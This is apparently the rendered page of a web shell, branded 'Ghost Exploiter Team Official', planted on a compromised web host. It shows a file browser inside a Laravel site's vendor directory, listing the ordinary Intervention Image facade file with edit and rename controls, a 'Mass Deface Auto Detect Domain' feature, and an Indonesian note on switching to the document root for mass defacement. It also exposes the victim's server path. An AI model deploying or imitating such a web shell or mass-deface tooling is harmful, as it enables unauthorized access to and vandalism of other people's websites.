webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
intervention
/
image
/
src
/
Intervention
/
Image
/
Facades
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Image.php
0.53KB
edt
ren
<?php namespace Intervention\Image\Facades; use Illuminate\Support\Facades\Facade; /** * @method static \Intervention\Image\Image make(mixed $data) * @method static self configure(array $config) * @method static \Intervention\Image\Image canvas(int $width, int $height, mixed $background = null) * @method static \Intervention\Image\Image cache(\Closure $callback, int $lifetime = null, boolean $returnObj = false) */ class Image extends Facade { protected static function getFacadeAccessor() { return 'image'; } }